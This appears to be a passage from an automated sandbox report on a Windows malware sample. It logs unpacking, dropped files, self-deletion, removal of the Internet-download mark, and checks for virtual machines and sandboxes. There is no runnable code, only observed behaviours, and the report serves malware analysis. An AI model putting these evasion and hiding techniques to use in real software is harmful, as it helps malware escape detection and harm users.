          Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uianimation.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cryptngc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cflapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: daxexec.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: container.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: stobject.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: batmeter.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: inputswitch.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: prnfldr.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dxp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: syncreg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: atlthunk.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: actioncenter.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: audioses.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pnidui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mobilenetworking.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wscinterop.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: networkuxbroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ethernetmediamanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wpnclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dusmapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wpdshserviceobj.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: portabledevicetypes.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: portabledeviceapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cscobj.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: srchadmin.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: synccenter.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: imapi2.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: storageusage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ncsi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: credui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wdscore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: settingsync.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: settingsynccore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wpnapps.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msxml6.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.xaml.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowsinternal.composableshell.desktophosting.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uiamanager.dllJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
          Source: C:\Users\user\AppData\Roaming\crwjtgtUnpacked PE file: 5.2.crwjtgt.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
          Source: initial sampleStatic PE information: section where entry point is pointing to: .vmpLp
          Source: 8FDD.exe.1.drStatic PE information: section name: .vmpLp
          Source: 8FDD.exe.1.drStatic PE information: section name: .vmpLp
          Source: 8FDD.exe.1.drStatic PE information: section name: .vmpLp
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408616 push eax; retf 0000h0_2_00408619
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401CD1 push ecx; ret 0_2_00401CD2
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004084E6 push FFFFFFFBh; iretd 0_2_004084FC
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401C91 push 00000076h; iretd 0_2_00401C93
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E96 push B92A2F4Ch; retf 0_2_00402E9B
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_029A1CF8 push 00000076h; iretd 0_2_029A1CFA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_029A2EFD push B92A2F4Ch; retf 0_2_029A2F02
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_029A867D push eax; retf 0000h0_2_029A8680
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_029A1D38 push ecx; ret 0_2_029A1D39
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_029A854D push FFFFFFFBh; iretd 0_2_029A8563
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02BB13AD push FFFFFFFBh; iretd 0_2_02BB13C3
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02BAF32F push edx; ret 0_2_02BAF330
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_00408616 push eax; retf 0000h5_2_00408619
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_00401CD1 push ecx; ret 5_2_00401CD2
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_004084E6 push FFFFFFFBh; iretd 5_2_004084FC
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_00401C91 push 00000076h; iretd 5_2_00401C93
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_00402E96 push B92A2F4Ch; retf 5_2_00402E9B
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_0289088D push FFFFFFFBh; iretd 5_2_028908A3
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_0288E80F push edx; ret 5_2_0288E810
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_0445867D push eax; retf 0000h5_2_04458680
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_04452EFD push B92A2F4Ch; retf 5_2_04452F02
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_04451CF8 push 00000076h; iretd 5_2_04451CFA
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_0445854D push FFFFFFFBh; iretd 5_2_04458563
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_04451D38 push ecx; ret 5_2_04451D39
          Source: file.exeStatic PE information: section name: .text entropy: 7.709343986759736
          Source: crwjtgt.1.drStatic PE information: section name: .text entropy: 7.709343986759736
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\crwjtgtJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8FDD.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\crwjtgtJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Deletes itself after installation
          Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\crwjtgt:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Checks if the current machine is a virtual machine (disk enumeration)
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\crwjtgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\crwjtgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\crwjtgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\crwjtgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\crwjtgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Roaming\crwjtgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Query firmware table information (likely to detect VMs)
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
          Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
          Source: C:\Users\user\AppData\Roaming\crwjtgtAPI/Special instruction interceptor: Address: 7FFE2220E814
          Source: C:\Users\user\AppData\Roaming\crwjtgtAPI/Special instruction interceptor: Address: 7FFE2220D584
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeAPI/Special instruction interceptor: Address: D79E6B
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeAPI/Special instruction interceptor: Address: BD76F5
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeAPI/Special instruction interceptor: Address: DA8181
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeAPI/Special instruction interceptor: Address: 1134DE8
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeAPI/Special instruction interceptor: Address: CF4080
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: file.exe, 00000000.00000002.1722649017.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, crwjtgt, 00000005.00000002.2006643465.000000000286E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 351Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 550Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 886Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 606Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1308Thread sleep count: 351 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 3512Thread sleep count: 550 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 3512Thread sleep time: -55000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 3300Thread sleep count: 321 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 3300Thread sleep time: -32100s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1544Thread sleep count: 196 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1196Thread sleep count: 177 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 4348Thread sleep count: 152 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exe TID: 3228Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exe TID: 5448Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000001.00000000.1711503091.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 0000000B.00000002.2874169511.000000000AE06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}A
          Source: explorer.exe, 0000000B.00000003.2447162030.0000000006BF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Interface\{000214E3-00
          Source: explorer.exe, 0000000B.00000002.2863074259.0000000000433000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000G
          Source: explorer.exe, 0000000B.00000002.2874169511.000000000AD60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000B.00000003.2446777046.0000000006BE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2658-3693405117-2476756634@3
          Source: explorer.exe, 0000000B.00000003.2562715901.000000000AEDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00
          Source: explorer.exe, 00000001.00000000.1707289032.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 0000000B.00000002.2868395597.0000000006C7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 0000000B.00000002.2874169511.000000000AE06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}=
